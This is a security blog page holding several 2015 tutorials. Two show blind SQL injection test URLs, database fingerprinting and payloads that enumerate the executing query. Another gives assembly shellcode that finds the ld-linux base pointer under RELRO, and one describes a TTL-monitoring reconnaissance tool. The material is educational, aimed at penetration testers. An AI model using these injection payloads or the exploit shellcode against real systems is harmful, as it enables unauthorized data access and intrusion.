April 13, 2015

Blind SQL Injection Testing and Efficient Fingerprinting

There are a number of "universal" methods that can be used to determine if a page is vulnerable to SQL injection; but once a vulnerability has been discovered, fingerprinting the database engine to determine the vendor (MySQL, PostgreSQL, Microsoft SQL Server, or others) can come with a bit of a headache and take more requests than desired. Some functionality and variables exist on multiple database engines (and in some cases all of them), while others are unique to specific services or service versions. This article will guide the reader through a couple of "universal" testing methods and eventually through efficient database fingerprinting.

Universal Injection Tests

Nearly everyone is familiar with using mathematical operators to test for SQL injection, but in some cases cross-site-scripting filters or other sanitizing may prevent mathematical characters (such as =,<, and >) from entering the vulnerable SQL query unscathed. There are two other "universal" comparison operators that can be used to confirm the presence of a vulnerability in an application: the "... between ... and ..." comparison operator, and the "is" operator.

Using the entry table from our last coverage on SQL injection, examples of the comparison operators referenced here have been provided in SQL statement examples in conjunction with a set of testing URLs that could produce similar results.

Testing with "... between ... and ..."

The "... between ... and ..." operator is simple. It tests to see if the first value is between the other two. It returns true if the value falls between the specified range, and false otherwise (queries in Figure 1-A).

Figure 1-A: Query examples using the "... between ... and ..." comparison operator
mysql> select * from entry where id=1 and 3 between 1 and 5;  # True
+----+-------------+
| id | name        |
+----+-------------+
|  1 | First entry |
+----+-------------+
1 row in set (0.01 sec)

mysql> select * from entry where id=1 and 7 between 1 and 5;  # False
Empty set (0.00 sec)

The first query displays the entry because 3 is between 1 and 5, but the second query returns an empty set because 7 is not between 1 and 5. When testing for remote injection vulnerabilities, test URL's may look something like the examples in Figure 1-B.

Figure 1-B: Integer testing examples using the "... between ... and ..." comparison operator
http://domain.tld/file.ext?id=1 and 3 between 1 and 5
http://domain.tld/file.ext?id=1 and 7 between 1 and 5

If the page at http://domain.tld/file.ext?id=1 were vulnerable to in-band or partially blind injection, the first example testing URL would return the same output as the unmodified URL, while the second example testing URL would cause data to be missing from the page.

In many cases, this operator also works on strings. Figure 1-C provides an example set of test URLs implementing a string test with this technique.

Figure 1-C: String testing examples using the "... between ... and ..." comparison operator
http://domain.tld/file.ext?title=Text' and 'b' between 'a' and 'c
http://domain.tld/file.ext?title=Text' and 'd' between 'a' and 'c

Testing with "is" and "is not"

The "is" operator is not a range or mathematical operator. It is also not to be confused with the equals (=) operator for equality, as the equals operator can be used on a variety of data types. The "is" operator works on fewer data types, but can also be used to determine where data has or hasn't been defined. SQL Servers have a way of representing it when columns have not been given a default value and a row in that column is undefined. This lack of value is referred to as null by every database engine, and every database engine allows the comparison operators of "is null" and "is not null". Example queries using this operator have been provided in Figure 2-A.

Figure 2-A: Query examples using the "is" and "is not" comparison operators
mysql> select * from entry where id=1 and null is null;      # True
+----+-------------+
| id | name        |
+----+-------------+
|  1 | First entry |
+----+-------------+
1 row in set (0.01 sec)

mysql> select * from entry where id=1 and null is not null;  # False
Empty set (0.00 sec)

Similarly to the first example, the first query returns data because null is always null. Null is also never not null, thusly the second query returns an empty set. A remote injection test using these operators may look something like Figure 2-B.

Figure 2-B: Testing examples using the "is" and "is not" comparison operators
http://domain.tld/file.ext?id=1 and null is null
http://domain.tld/file.ext?id=1 and null is not null

Remote Database Fingerprinting

By isolating the similarities and differences between different database engines, it is possible to use very few requests to determine which database server provides dynamic content support for the vulnerable application. While the techniques here do not reveal a specific version number, they do reveal the vendor of the server software. Knowing the vendor of the database server software is enough information to use vendor-specific techniques that reveal the rest of the version information.

There are enough similarities and differences between Microsoft SQL Server, PostgreSQL Server, and MySQL server to determine which of these (or if any of these) vendors provided the server software powering the application in only two requests. MySQL and PostgreSQL share a version() function that returns the server version information. Microsoft SQL Server has the @@version system variable in common with MySQL, but PostgreSQL does not. Knowing this, seeing the output of the two requests in Figure 3 from a vulnerable page gives us the ability to logically deduce which, if any, of the three vendors mentioned developed the software.

Figure 3: Example version fingerprinting URLs
http://domain.tld/file.ext?id=1 and version() is not null
http://domain.tld/file.ext?id=1 and @@version is not null

If the output of the page returns a "true" response for both requests, the vulnerable application is using a MySQL back-end. This can be deduced because MySQL is the only database server that has both the version() function and the @@version system variable. If only the test using the version() function returns true, the target application is running PostgreSQL. If only the test using the @@version system variable returns true, the vulnerability applies to a Microsoft SQL Server. If both queries return false, and characters are not being filtered, the target may be running Oracle Server, as Oracle does not support either the system variable or the version() function. Once the vendor of the database software has been determined, version information can be enumerated or selected using standard SQL injection techniques. Other efficient fingerprinting techniques can be found by inspecting reference manuals for nuances related to functions and environment variables with a little bit of testing.

April 11, 2015

Inspecting Remote Network Topography by Monitoring Response Time-To-Live

There are times when network administrators may configure a single host to forward various ports to other hosts at different tiers within their internal network. A single Internet Protocol (IP) address may actually represent as many machines on an internal network as it has open ports. While it is somewhat elementary to detect this, surprisingly popular tools have yet to incorporate information related to the discovery of tiered networks in their respective output. This post will guide the reader through the process of monitoring Time-To-Live (TTL) values during routine activities to acquire information about port forwarding and intrusion response surrounding remote hosts.

Understanding TTL Responses

Each time a host sends data to another, the data travels in a packet, from one host along a series of routers, switches, and other hosts, until reaching its destination. The TTL header exists within this packet and specifies how many hops the packet can travel before no longer being forwarded. Each "hop" the packet encounters decrements the TTL value in the header.

TTL's Can Reveal Route Changes

Route changes can occur semi-frequently across the internet as internet service providers tighten their relationships with Tier1 Backbone Providers. When these changes occur, every response from a host on the other side of a changed route may change TTL values at once. A route change may occur due to normal internet expansion, a network appliance restricting traffic from a particular source into a honeypot, or a port redirect for load-balancing purposes.

TTL's In Scan Responses

During a port scan, SYN packets are sent to the target host on a variety of ports in order to evoke a response, revealing which ports have services listening behind them. While all of the packets sent by the scanner (unless the scanner is told otherwise) will have the same TTL to start with, there are times when the IP address being scanned will actually have different TTL values in its responses. The differing TTL's can indicate additional "tiers" of networking behind the public IP address being scanned. The higher the TTL, the closer the host running the service is to the scanning host; the lower the TTL, the further the host is from the scanning host.

In other words, if the host has a baseline response TTL of 47, but a response comes in with a TTL of 45, the port the response came from may be visibly forwarded. On the other hand, if a packet is received with a TTL of 48 from the same host, it may have actually originated from a device between the scanning host and the target host.

TTL's Could Betray Firewalls and Intrusion Responses

Port scanning isn't the only time it can be advantageous to monitor for TTL anomalies. Firewalls and Intrusion Prevention Systems (IPS's) between an attacker and their target can also respond with RST packets to terminate connections which are considered harmful. Because these appliances sit between the attacker and the target, the RST packet received by the attacker will have a TTL that is higher in value than that of the packets received from the target host's normal service on that port.

ttl_mon.py: A Passive Python2 TTL Monitor

In order to monitor for TTL anomalies, the team put together ttl_mon.py on github. It runs until the user exits using control+C, and prints detailed information on a host-by-host basis about the hosts it encountered during runtime. When TTL values for individual ports change during runtime, a red notification about route modification is printed to the screen. It has the ability to monitor all hosts on a given interface or a single target host while ignoring locally emitted traffic.

Dependencies

ttl_mon.py depends on the dpkt and pcapy packages for python2. They can be installed using the python pip module like so:

python2 -mpip install pcapy dpkt

Usage

Usage: ttl_mon.py [options]

Options:
  -h, --help            show this help message and exit
  -i INTERFACE, --interface=INTERFACE
                        Interface to listen to
  -l LOCAL, --local=LOCAL
                        Local address to ignore
  -t TARGET, --target=TARGET
                        Only record changes for this ip

March 20, 2015

Resolving the Base Pointer of the Linux Program Interpreter with Shellcode

Oftentimes an exploit developer desires the ability to call functions from shared libraries with their shellcode and a guarantee of proper function resolution. The way that the Linux Executable and Linkable Format (ELF) Application Binary Interface (ABI) works, a program interpreter (nearly always ld-linux) is specified in the binary's .INTERP section. When a program is executed, the program interpreter loads all of the associated shared libraries and then populates the program's import table, called the Global Offset Table (GOT), with pointers to the appropriate functions.

Because of Address Space Layout Randomization (ASLR), the pointers to these shared libraries and functions are different each execution of the program. This can make calling functions not referenced in an application's GOT from shellcode more difficult. By isolating the address space of the program interpreter, it is possible to parse its binary format and re-use its code to load shared objects and call functions not referenced by an application's import table. The code examples here cover locating the memory space of ld-linux; however they do not cover the code integration aspect. That will be covered either here at a later date, in our planned shellcode workshop, or both.

The GOT can be populated one of two ways, depending on the mode of relocate read-only (RELRO) selected at compile-time:

  1. Partial RELRO contexts populate the GOT as the functions are needed.
  2. Full RELRO contexts populate the entire GOT before jumping to the application's entry point.

Helpful VMA's

Before diving into resolution of the program interpreter, the reader should note the following Virtual Memory Addresses (VMAs) which are present 100% of the time for their ABI/Architecture.

ELF32

  • 0x8048000 is the base pointer of the currently executing binary, 100% of the time.
  • 0x80480bc contains a 4-byte VMA that is a pointer to the currently executing binary's DYNAMIC section.

ELF64

  • 0x400000 is the base pointer of the currently executing binary, 100% of the time.
  • 0x400130 contains a 4-byte VMA that is a pointer to the currently executing binary's DYNAMIC section.

Partial RELRO

The partial RELRO context is default on most variants of GCC on Linux; and does not clean up all of the references to ld-linux at runtime. In fact, in partial RELRO contexts, the program interpreter leaves behind a small gem, a pointer to _dl_runtime_resolve. This pointer is left at the third index of the Procedure Linkage Table (PLT) so that functions can be resolved as they are called. Simply migrating backwards in memory space from _dl_runtime_resolve until ELF magic (0x7f 0x45 0x4c 0x46) is reached can isolate the base pointer of ld-linux on partial RELRO contexts.

The example code below locates .GOT.PLT[2] by traversing through the dynamic section. Starting at the dynamic section, the next occurance of a pointer to the dynamic section is always .GOT.PLT[0]. This code places the ld-linux base pointer into the %rcx register.

# ABI="ELF64"
.section .text
.global main
main:             
  # read the dynamic header
  push $0x400130ff
  pop %rbx
  shr $0x08, %ebx          #  %rbx  = 0x400130
                           # (%rbx) = location of dynamic section

skip_to_dynamic:  
  # this is a vma, so 32 bit reg is fine.
  mov (%rbx), %esi         # put dynamic section location into %rsi

fix_dflag:        
  cld                      # make the dflag go forwards...

find_got_plt:     
  # Search past the dynamic section until it finds
  # another pointer to the dynamic section.  This
  # will be the beginning of .got.plt
  lodsl                    # lodsl for magically short searching
  cmpl %eax, (%rbx)        # save a couple bytes because its a vma.
  jne find_got_plt

found_resolver:   
  mov 0xc(%rsi), %rcx      # %rcx = qword pointer to resolver
                           # usually _dl_runtime_resolve (.got.plt[2])

find_base:        
  xor %cl, %cl             # it'll be an address ending in 00
                           # if this doesn't happen, it may also find false bases
                           
  cmpl $0x464c457f, (%rcx) # check for ELF magic
  loopne find_base         # loopne automatically does a dec %rcx

libdl_base_found: 
  # Make %rcx a direct pointer to libdl_base after that,
  # the loop decrements it one too many times.
  inc %rcx
compile/assemble: gcc partial-relro.s -o partial_relro

There is still a problem with this example, though. This code can't isolate the base pointer in a full RELRO environment. In a full RELRO environment, the PLT is cleaned up a bit and pointers to the resolver are removed before jumping to the entry point. After a lot of observations at runtime using gdb, and inspecting executable files on-disk using the readelf utility, a solution was devised.

Full RELRO

After looking at many binaries, it was discovered that every dynamic section contains a pointer to the PLT. In every single binary observed, the pointer just before this points to a DEBUG section (blank on disk). In gdb this section is recognized as r_debug. The fifth pointer in r_debug (offset 0x10 in 32 bit and offset 0x20 in 64 bit) is a pointer directly to the ld-linux base. So the process is as follows:

  1. Traverse to the dynamic section.
  2. Find got.plt by looping fowards in memory until a pointer to _DYNAMIC_ is found.
  3. Loop backwards in memory from got.plt until a pointer to got.plt is found.
  4. Grab the pointer just before the pointer to .got.plt, this is a pointer to DEBUG.
  5. Put the fifth pointer in DEBUG into a register -- this is the base pointer to ld-linux.

The ELF32 proof-of-concept code below illustrates this process effectively, placing the base pointer into the ebx register. Note it is compiled with gcc's "-s" option, which removes debug information from the on-disk binary. The ABI populates the DEBUG segment this code uses at runtime, which is why this code works.

# ABI="ELF32"
.section .text
.global main
main:
  mov 0x80480bc, %ebx   # move pointer to _DYNAMIC_ into ebx
  push %ebx
  pop %esi              # copy ptr to esi


find_got:               # loop until the GOT is found
  lodsl
  cmp %ebx, %eax
  jne find_got


find_debug:             # loop backwards until a pointer
  xchg %ebx, %esi       # to GOT is found
  sub $0x4, %ebx

find_debug_loop:
  lodsl
  cmp %ebx, %eax
  jne find_debug_loop


found_debug:
  mov -0xc(%esi), %eax  # Grab the entry in the symbol table 
                        # before GOT (r_debug)

get_interp_base:        # move the fifth pointer in DEBUG
  mov 0x10(%eax), %ebx  # into ebx - ptr to ld-linux base
compile/assemble: gcc -fstack-protector-all -s -fPIE -Wl,-z,relro,-z,now relro-ld-basefinder.s -o relro-ld-basefinder

This technique works on ELF64 as well as ELF32. It also appears to work regardless of whether the above compile options are present, and thusly is a reliable method for determining the address of ld-linux's ELF magic. This code has been used to start a new abicode project on our github.

Update - ELF64 version of the above code for full relro added to abicode. These "full relro" versions work in partial relro and non-relro environments too.

Related Links & Resources

March 19, 2015

Enumerating the Currently Executing Query Context with SQL Injection

There are many times when performing a penetration test that an auditor can run into a blind SQL injection vulnerability. In some cases, the vulnerability is not actually blind and can be accessed using a union select or joint select statement; however in-band exploitation is impossible without knowing the SQL query generated by the vulnerable application. This post will guide the reader through usable queries for enumeration that can be leveraged to discover the SQL statement currently being exploited. It assumes that the reader already understands how to enumerate data through an SQL injection vulnerability.

The Currently Executing Query

The queries here were tested on MySQL Server version 5.1 (documentation) and PostgreSQL Server version 9.1 (documentation); to test these without an environment, use the SQL Fiddle. In MySQL, the following query returns itself:

mysql> select info from information_schema.processlist where id=connection_id();
+--------------------------------------------------------------------------+
| info                                                                     |
+--------------------------------------------------------------------------+
| select info from information_schema.processlist where id=connection_id() |
+--------------------------------------------------------------------------+
1 row in set (0.12 sec)

Similarly, in PostgreSQL 9.1, the query below will suffice:

select query from pg_stat_activity where pid=pg_backend_pid();

When injecting into a query, these payloads can be used to discover the context of the query being injected; but there is a crucial problem yet to solve, addressed below.

Challenges Introduced by Enumeration

When enumerating data, a URL may look similar to:
http://domain.tld/file.ext?id=1 and [query][comparison]

Enumerating data can take 8 requests to retrieve a single byte, and works by asking the server to perform a series of comparisons (yes or no questions) until a value can be isolated. Because the comparisons are changing as the value of the data is being discovered, attempting to run the above queries on their own using an automated tool through an injection would probably fail when the tool begins attempting to enumerate data that it is changing each request.

To compensate for this, a "needle" can be inserted into a MySQL query by assigning a value to a variable. This needle can then be used as a marker to determine when to stop enumerating the data, or even to select only parts of the executing query that do not change. Suppose table `entry' is accessed by the vulnerable page, running the following query:

mysql> select * from entry where id=1;
+----+-------------+
| id | name        |
+----+-------------+
|  1 | First entry |
+----+-------------+
1 row in set (0.02 sec)

The important part of the query in this situation that a remote attacker can't see is "select * from entry where id=". A valid injection to set the variable "myvar" may look like:

http://domain.tld/file.ext?id=1 and @myvar:=10

Which would turn the query into:

select * from entry where id=1 and @myvar:=10;

The purpose of defining a variable is not to use it at any point, however to inject it as a marker. It can be used as a needle when passed as an argument to MySQL's substring_index() function. A union select example illustrates this below:

mysql> select * from entry where id=1 and @myvar:=10
    -> union select 1,substring_index(
    ->   (select info from information_schema.processlist where id=connection_id()),
    ->   '@myvar',
    ->   1);
+----+-------------------------------------+
| id | name                                |
+----+-------------------------------------+
|  1 | First entry                         |
|  1 | select * from entry where id=1 and  |
+----+-------------------------------------+
2 rows in set (0.00 sec)

Notice that the second line containing the output of the union select is the currently executing SQL query only UP TO the point of the injected needle. This example won't work during a blind SQL injection, though. A url to enumerate the information with blind SQL injection may look something like:

http://domain.tld/file.ext?id=1 and @myvar:=10 and ascii(substring(substring_index(
(select info from information_schema.processlist where id=connection_id()),'@myvar'
,1),1,1)) between 0 and 255
(Newlines added for legibility)

The above query should always be true on MySQL databases, because the ascii code of the first character of the query being executed should always be between 0 and 255. It would generate the following query and output as a "true" statement:

mysql> select * from entry where id=1 and @myvar:=10
    -> and ascii(substring(substring_index(
    -> (select info from information_schema.processlist where id=connection_id()),
    -> '@myvar',
    -> 1),1,1)) between 0 and 255;
+----+-------------+
| id | name        |
+----+-------------+
|  1 | First entry |
+----+-------------+
1 row in set (0.05 sec)

Unfortunately, the info column of MySQL's information_schema.processlist table will not contain comments in the query, and thusly they cannot be used as needles during injection.

PostgreSQL, on the other hand, does not have a substring_index() function. It provides the same feature using a function called split_part(). PostgreSQL also wont let developers use WHERE clauses for in-line variable definitions. On the bright side, PostgreSQL does retrieve comments from its "pg_stat_activity" view. An example enumeration URL for a PostgreSQL injection:

http://domain.tld/file.ext?id=1/*marker*/ and ascii(substring(split_part((select 
query from pg_stat_activity where pid=pg_backend_pid()),'/*marker*/',1),1,1)) 
between 0 and 255
(Newlines added for legibility)

This may turn the query into something like:

select * from entry where id=1/*marker*/ and ascii(substring(split_part((select 
query from pg_stat_activity where pid=pg_backend_pid()),'/*marker*/',1),1,1)) 
between 0 and 255
(Newlines added for legibility)

There are some rare edge cases in which multiple queries will be executing within the PID context. This can happen because of INSERT DELAYED statements or a variety of other concurrency tricks (like triggers). In order to be sure the query only returns the correct row, consider appending a LIKE condition and a limit clause (be sure to urlencode the "%" SQL wildcard character as %25):

http://domain.tld/file.ext?id=1/*marker*/ and ascii(substring(split_part((select 
query from pg_stat_activity where pid=pg_backend_pid() and query like '%marker%'
limit 1),'/*marker*/',1),1,1)) between 0 and 255
(Newlines added for legibility)

A similar clause will work on MySQL:

http://domain.tld/file.ext?id=1 and @myvar:=10 and ascii(substring(substring_index(
(select info from information_schema.processlist where id=connection_id() and info
like '@myvar' limit 1),'%@myvar%',1),1,1)) between 0 and 255
(Newlines added for legibility)

Being able to determine a query context like this can be a valuable skill; it may be possible to extract data with methods better than blind enumeration once the query has been revealed. More on this topic will be addressed in our upcoming SQL injection workshop.

In closing, as this is the first post here, it has to be said: please use these techniques responsibly. Respect your internet neighbors and always do the right thing.